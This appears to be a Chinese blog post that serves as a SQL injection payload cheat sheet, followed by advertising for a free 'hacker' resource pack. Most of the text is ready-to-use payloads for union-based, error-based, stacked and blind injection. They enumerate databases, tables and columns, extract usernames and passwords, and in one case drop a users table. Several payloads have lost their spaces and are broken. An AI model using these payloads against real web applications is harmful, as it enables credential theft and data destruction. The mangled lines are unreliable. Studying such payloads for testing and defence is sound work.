文章目录
SQL
联合注入Payload
#查字段
1' order by 1#
1' order by 100#
#联合查询(假设字段为3)
-1' union select 1,2,3# //-1使页面报错,方便显示
#查所有数据库名(假设回显为2)
-1' union select 1,database(),3#
-1' union select 1,database(),3 from information_schema.tables#
#查看版本
-1' union select 1,version(),3#
#查指定库的表名
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='库名'#
#查指定表的列名
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='库名' and table_name='表名'#
#查看指定列名的内容
-1' union select 1,group_concat(列名1,0x3a,列名2),3 from 库名.列名#
报错注入Payload
extractvalue函数
#extractvalue() //空格和"="被过滤的情况
1'^extractvalue(1,concat(0x5c,(select(database()))))# //爆库名
1'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('库名'))))# //查表名
1'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('表名'))))# //查列名
1'^extractvalue(1,concat(0x7e,(select(left(列名,30))from(库名.表名))))# //查从左数30个字段
1'^extractvalue(1,concat(0x7e,(select(right(列名,30))from(库名.表名))))#
updatexml函数
#updatexml()函数
1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)# //爆库
1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='库名' limit 0,1),0x7e),1)# //查表名
1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1),0x7e),1)# //查列名
1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)# //查数据
我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
BigInt数据类型溢出
#BigInt数据类型溢出--exp()或pow()
1' and exp(~(select * from (select user())a))# //查看当前库的权限
1' and exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a))# //查表名
1' and exp(~(select * from (select column_name from information_schema.columns where table_name='表名' limit 0,1)a))# //查列名
1' and exp(~(select * from(select '列名' from '表名' limit 0,1)))# //获取对应信息
floor函数
#floor()函数
1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#
堆叠注入Payload
常规查询语句
1';show databases;# //查库名·
1';show tables;# //查表名
1';show columns from `表名`;# //查列名,表名用反引号包围
rename改表改列
1';RENAME TABLE `表1` TO `表2`;RENAME TABLE `表3` TO `表1`;ALTER TABLE `表1` CHANGE `列1` `列2` VARCHAR(100) ;show columns from 表1;# //将表1改名为表2,将表3改名为表1,再将表1的列1改为列2,最后查看表1的列名信息 //适用于查看没有权限的表
handler读取表中数据
1';HANDLER 表名 OPEN;HANDLER 表名 READ FIRST;HANDLER 表名 CLOSE;# //此方法使用于在查列时select被禁的情况,逻辑为打开指定表名,读取表中第一行数据,关闭表并释放资源。
set转换操作符
1;set sql_mode=PIPES_AS_CONCAT;select 1 //适用于后端代码采用'||'判断的情况。
sql预处理
PREPARE hacker from concat('s','elect', ' * from `表名` ');
EXECUTE hacker;# //绕过特定字符串的过滤
set@a=hex编码值;prepare hacker from @a;execute hacker;# //结合hex(进制)编码实现绕过
盲注Payload
基于布尔盲注Payload:
id=1 AND (SELECT COUNT(*) FROM users) > 0id=1 AND SUBSTRING((SELECT version()), 1, 1) = '5'id=1 AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'), 1, 1)) = 97id=1 AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='public') > 10id=1 AND LENGTH((SELECT database())) = 6
基于时间盲注Payload:
id=1; IF((SELECT COUNT(*) FROM users) > 0, SLEEP(5), NULL)id=1; IF((SELECT ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'), 1, 1))) = 97, BENCHMARK(10000000, MD5('a')), NULL)id=1; IF(EXISTS(SELECT * FROM information_schema.tables WHERE table_schema='public' AND table_name='users'), BENCHMARK(5000000, SHA1('a')), NULL)id=1; IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users') = 5, SLEEP(2), NULL)id=1; IF((SELECT SUM(LENGTH(username)) FROM users) > 20, BENCHMARK(3000000, MD5('a')), NULL)
错误基于盲注Payload:
id=1 UNION ALL SELECT 1,2,table_name FROM information_schema.tablesid=1 UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE table_name='users'id=1 UNION ALL SELECT username,password,3 FROM usersid=1'; SELECT * FROM users WHERE username='admin' --id=1'; DROP TABLE users; --
布尔盲注
判断数据库名称长度
1' and length(database())>20 #
//判断数据库名称长度是否大于20
SELECT length('Hello World'); -- 输出 11
SELECT length(column_name) FROM table_name; -- 计算表中某一列的长度
获取数据库名称组成
1' and ascii(substr(database(),1,1))>20 #
判断表个数
1' and (select count(table_name) from information_schema.tables where table_schema=database()) <10#
获取表名称长度
1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) > 10 #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 #
//第一个字符
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))判断表达式 #
//第二个字符
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))判断表达式 #
//第三个字符
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))判断表达式 #
获取列数
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='表名')判断表达式 #
获取列名长度
//判断第一个列名长度
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))判断表达式 #
//判断第二个列名长度
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 1,1),1))判断表达式 #
获取列名字符组成
//获取 users 表中第一个列名的第一个字符
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users'limit0,1),1,1))判断表达式 #
//获取 users 表中第二个列名的第一个字符
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),1,1))判断表达式 #
//获取 users 表中第三个列名的第一个字符
1'andascii(substr((select column_name from information_schema.columns where table_name = 'users'limit2,1),1,1))判断表达式 #
//获取 users 表中第三个列名的第二个字符
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 2,1),2,1))判断表达式 #
//获取 users 表中第三个列名的第三个字符
1'andascii(substr((select column_name from information_schema.columns where table_name = 'users'limit2,1),3,1))判断表达式 #
获取字段长度
//获取列中第一个字段长度
1' and length(substr((select user from users limit 0,1),1))判断表达式 #
//获取列中第二个字段长度
1' and length(substr((select user from users limit 1,1),1))判断表达式 #
获取字段
//获取第一个字段的第一个字符
1' and ascii(substr((selectuserfromuserslimit0,1),1,1))判断表达式 #
//获取第一个字段的第二个字符
1' and ascii(substr((select user from users limit 0,1),2,1))判断表达式 #
//获取第二个字段的第一个字符
1'andascii(substr((selectuserfromuserslimit1,1),1,1))判断表达式 #
//获取第二个字段的第二个字符
1' and ascii(substr((select user from users limit 1,1),2,1))判断表达式 #
判断数据库名称长度
1' and if(length(database())=1,sleep(5),1)
if(expr1,expr2,expr3)函数:
判断数据库名称组成
1' and if(ascii(substr(database(),1,1))>90,sleep(5),1)#
判断表个数
1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1)
获取表名称长度
1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=9,sleep(5),1) #
获取表名称组成
1' and (select ascii(substr(table_name, 1, 1)) from information_schema.tables where table_schema = 'dvwa' limit 1) >= 100 and sleep(5)#
//获得第一个表名称的第二个字符
1' and (select ascii(substr(table_name, 2, 1)) from information_schema.tables where table_schema = 'dvwa' limit 1)判断表达式 and sleep(5)#
//获得第一个表名称的第三个字符
1' and (select ascii(substr(table_name, 3, 1)) from information_schema.tables where table_schema = 'dvwa' limit 1)判断表达式 and sleep(5)#
//获得第二个表名称的第一个字符
1' and (selectascii(substr(table_name, 1, 1)) from (select table_name from information_schema.tables where table_schema = 'dvwa'limit1,1) as second_table limit1) 判断表达式 andsleep(5)#
//获得第二个表名称的第二个字符
1' and (select ascii(substr(table_name, 2, 1)) from (select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1) as second_table limit 1) 判断表达式 and sleep(5)#
//获得第二个表名称的第三个字符
1'and (selectascii(substr(table_name, 3, 1)) from (select table_name from information_schema.tables where table_schema = 'dvwa'limit1,1) as second_table limit1) 判断表达式 andsleep(5)#
//以此类推
获取列数
1' and if((select count(column_name) from information_schema.columns where table_schema=database() and table_name= 'guestbook')=3,sleep(5),1) #
获取列名长度
1' and if(length(substr((select column_name from information_schema.columns where table_name= 'guestbook' limit 0,1),1))判断表达式,sleep(5),1) #
获取列名字符组成
获取第一个列名的第一个字符
1' and if((select ascii(substr(column_name, 1, 1)) from information_schema.columns where table_name = 'guestbook' limit 0,1) = 判断表达式, sleep(5), 1) #
//获取第一个列名的第二个字符
1' and if((selectascii(substr(column_name, 2, 1)) from information_schema.columns where table_name = 'guestbook'limit0,1) = 判断表达式, sleep(5), 1) #
//获取第一个列名的第三个字符
1' and if((select ascii(substr(column_name, 3, 1)) from information_schema.columns where table_name = 'guestbook' limit 0,1) = 判断表达式, sleep(5), 1) #
//获取第二个列名的第一个字符
1'andif((selectascii(substr(column_name, 1, 1)) from information_schema.columns where table_name = 'guestbook'limit1,1) = ASCII_VALUE, sleep(5), 1) #
//获取第二个列名的第二个字符
1' and if((select ascii(substr(column_name, 2, 1)) from information_schema.columns where table_name = 'guestbook' limit 1,1) = ASCII_VALUE, sleep(5), 1) #
//获取第二个列名的第三个字符
1'andif((selectascii(substr(column_name, 3, 1)) from information_schema.columns where table_name = 'guestbook'limit1,1) = ASCII_VALUE, sleep(5), 1) #
//获取第三个列名的第一个字符
1' and if((select ascii(substr(column_name, 1, 1)) from information_schema.columns where table_name = 'guestbook' limit 2,1) = ASCII_VALUE, sleep(5), 1) #
获取字段
1' and if((select ascii(substring(column_name, 1, 1)) from information_schema.columns where table_name = 'users' limit 0,1)判断表达式, sleep(5), 1) #
//获取 user 列名的第一个字段的第二个字符
1' and if((selectascii(substring(column_name, 2, 1)) from information_schema.columns where table_name = 'users'limit0,1)判断表达式, sleep(5), 1) #
//获取 user 列名的第一个字段的第三个字符
1' and if((select ascii(substring(column_name, 3, 1)) from information_schema.columns where table_name = 'users' limit 0,1)判断表达式, sleep(5), 1) #
//获取 user 列名的第二个字段的第一个字符
1'andif((SELECTASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE table_name = 'users'LIMIT1, 1)判断表达式, sleep(5), 1) #
//获取 user 列名的第二个字段的第二个字符
1' and if((SELECT ASCII(SUBSTRING(column_name, 2, 1)) FROM information_schema.columns WHERE table_name = 'users' LIMIT 1, 1)判断表达式, sleep(5), 1) #
//获取 user 列名的第二个字段的第三个字符
1'andif((selectascii(substring(column_name, 3, 1)) from information_schema.columns where table_name = 'users'limit1,1)判断表达式, sleep(5), 1) #
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取
👉1.成长路线图&学习规划👈
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
👉2.网安入门到进阶视频教程👈
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
👉3.SRC&黑客文档👈
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)
👉4.护网行动资料👈
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
👉5.黑客必读书单👈
👉6.网络安全岗面试题合集👈
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
